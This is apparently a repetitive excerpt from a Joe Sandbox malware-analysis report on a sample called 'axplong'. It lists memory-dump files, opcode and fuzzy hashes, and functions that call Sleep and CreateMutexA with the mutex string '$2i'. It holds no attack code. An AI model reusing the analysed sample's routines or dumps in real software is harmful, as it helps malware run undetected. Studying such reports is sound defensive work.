Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 8dbfd27ca2ecf8c4b38a93a5ba4a2194ece77db366dace1b0dc62e06fc80a8d4
Instruction ID: fbd484e72104ecc9ce9dca8896509d4dfdfcb86b774807ab2f740f482a866b13
Opcode Fuzzy Hash: 8dbfd27ca2ecf8c4b38a93a5ba4a2194ece77db366dace1b0dc62e06fc80a8d4
Instruction Fuzzy Hash: BF316A31A10200CBFB189BBCDD887ADB7A39F86318F20826CE150DB7D5D7759981A792

Function 0063A47D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: e2b6c36838b8dffba405907b2d53fd4383975a5123988078f1c71b02d4d31d70
Instruction ID: 599696ab42d3e7d5ff80c77ed542289aebef4e7f409d1385e0ec225e99469718
Opcode Fuzzy Hash: e2b6c36838b8dffba405907b2d53fd4383975a5123988078f1c71b02d4d31d70
Instruction Fuzzy Hash: D1317D31B00100CBEB08DBBCDD8476DBB639F86318F20436DE1959B7D6D7759981A792

Function 0063A5B2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 5643509cf2f1f67483e2ee9508559c48ec10b269f3823d5c0120946e3612630b
Instruction ID: 444843613f3f7325bc2e187cd09a8e69fd1187fc2e3300a4023695e0e227b084
Opcode Fuzzy Hash: 5643509cf2f1f67483e2ee9508559c48ec10b269f3823d5c0120946e3612630b
Instruction Fuzzy Hash: 0E317931B00200DBEB08DBBCDD857ADBB639F86318F24826CE0509B7D5C7359982A792

Function 00639A0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: a340aa4cc566f77cd363894b0fae9970e5857a8d54b170c93b4655a53cb4ef43
Instruction ID: b7ffbf96d49933ac0878ae12e2e7fc6f9ea660cee9a90a50058cf74bef0206cb
Opcode Fuzzy Hash: a340aa4cc566f77cd363894b0fae9970e5857a8d54b170c93b4655a53cb4ef43
Instruction Fuzzy Hash: 6721A631604200CBEB189B6CEC8476CB7A3EF82314F20432DE5448B7D4CB71998297A2

Function 0063A27F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 393d2ace9f72fd6a4cee5fae7b8761c0bc608d41c8e8adc665356275522e00d7
Instruction ID: d5b22cf45c05c51f2070c77ac5630d8b7f19b8e3cf44bbfc430f6c8b2441a148
Opcode Fuzzy Hash: 393d2ace9f72fd6a4cee5fae7b8761c0bc608d41c8e8adc665356275522e00d7
Instruction Fuzzy Hash: D0217931754200DBFB089BACDD8476DBBA3DF81314F24022DE545DB7D5CB369A829392

Function 0063A786 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
